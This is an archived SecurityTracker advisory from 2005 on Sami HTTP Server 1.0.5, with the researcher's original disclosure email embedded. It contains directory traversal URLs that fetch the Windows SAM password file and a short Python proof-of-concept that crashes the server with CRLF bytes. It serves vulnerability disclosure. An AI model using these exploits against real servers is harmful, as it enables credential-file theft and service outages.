SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Sami HTTP Server Vendors:   KarjaSoft
Sami HTTP Server Input Validation Holes Disclose Files to Remote Users and Let Remote Users Crash the Service
SecurityTracker Alert ID:  1013191
SecurityTracker URL:  http://securitytracker.com/id/1013191
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 15 2005
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.0.5
Description:   Ziv Kamir of Global Security Solution IT reported a vulnerability in Sami HTTP Server. A remote user can view files on the target system or cause the web service to crash.

A remote user can send a specially crafted HTTP request containing '../' directory traversal characters to obtain files on the system that are located outside of the web document directory. Encoded directory traversal characters can also be used.

Some demonstration exploit URLs are provided:

http://[target]/../../winnt/repair/sam

http://[target]/%2e%2e/%2e%2e/winnt/repair/sam

A remote user can also send an HTTP request with two Carriage Return (CR) and Line Feed (LF) characters ('\x0d\x0a') to cause the web service to crash.

The vendor was notified on February 6, 2005 without response.

Impact:   A remote user can view files on the target system that are located outside of the web document directory.

A remote user can cause the target web service to crash.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.karja.com/samihttp/ (Links to External Site)
Cause:   Exception handling error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Sami HTTP Web Server Ver 1.0.5


--0-530889896-1108467253=:50538
Content-Type: multipart/alternative; boundary="0-541059298-1108467253=:50538"

--0-541059298-1108467253=:50538
Content-Type: text/plain; charset=us-ascii

Web : www.gssit.co.il
 
 


		
---------------------------------
Do you Yahoo!?
--0-541059298-1108467253=:50538
Content-Type: text/html; charset=us-ascii

<DIV>
<DIV>Web : <A href="http://www.gssit.co.il/">www.gssit.co.il</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV></DIV><p>
		<hr size=1>Do you Yahoo!?<br> 
--0-541059298-1108467253=:50538--
--0-530889896-1108467253=:50538
Content-Type: text/plain; name="Sami.txt"
Content-Description: Sami.txt
Content-Disposition: inline; filename="Sami.txt"

15/02/05


====================================
 GSSIT - Global Security Solution IT
====================================		

-------------------------------------------------------

Application: Sami HTTP Server 
Web Site:    www.karja.com
Versions:    1.0.5
Platform:    Windows 

             
                           
Credits:
########

#########################################
#         ==  Ziv Kamir ==              #
#                                       #
# GSSIT - Global Security Solution IT   #                   
#                                       #
#     WEB : www.gssit.co.il             #
#                                       #
#                                       #
#########################################

---------------------

1) Introduction
2) Bugs
3) The Code
4) Fix


================
1) Introduction
================

Easy to set up webserver, for when you value simplicity and ease of use. 

Some of the features are: 

Simple setup, and runs on Windows 95/98/Me/NT/2000/XP 
Full access to all the server's features from the main control in the system tray 
Configuration with a few simple clicks; no need to edit configuration files or run a lengthy setup 
Enable PHP support on Sami HTTP Server with a few clicks. 

=======
2) Bugs
=======
 
1) A remote user can obtain files on the system that are located outside of the web document directory. 

2) The web server can be crashed by sending two Carriage Return (CR) and Line Feed (LF) [ \x0d\x0a ]. 

===========
3) The Code
===========

1)

http://[Target]/../../winnt/repair/sam

http://[Target]/%2e%2e/%2e%2e/winnt/repair/sam


2)

#######################################################################################################

##############################################################
#        GSS-IT Research And Security Labs                   #
##############################################################
#                                                            #
#                www.gssit.co.il                             #
#                                                            #
##############################################################
#  Sami HTTP Web Server Ver 1.0.5  Denial Of Service PoC     #
##############################################################
#        Use This PoC For Educational Purposes Only          #
##############################################################

import sys
import socket


print("##########################################################\n")
print("#  Sami HTTP Web Server Ver 1.0.5 Denial Of Service PoC  #\n")
print("##########################################################\n\n")

if (len(sys.argv) < 3 ) :
 print "Usage: %s <Target> <Port>" %sys.argv[0]
 sys.exit(0)

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = sys.argv[1]
port   = int(sys.argv[2])

try:
 server.connect((target,port))
 print "Sending CRLF ...\n\n"
 server.send("\x0d\x0a\x0d\x0a")
 server.close()
 print "Done ... Check your web server"
except:
 print "Cannot connect to http server on %s" %target


#######################################################################################################

======
4) Fix
======

Date of Vendor Notification:
----------------------------

06/02/05

Response:
=========

No Response.

==============================================================================================

                 *** The Data is for educational purpose only. *** 

          The information in this bulletin is provided "AS IS" without 
          warranty of any kind. In no event shall we be liable for any 
          damages whatsoever including direct, indirect, incidental, 
          consequential, loss of business profits or special damages. 

==============================================================================================
--0-530889896-1108467253=:50538--
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC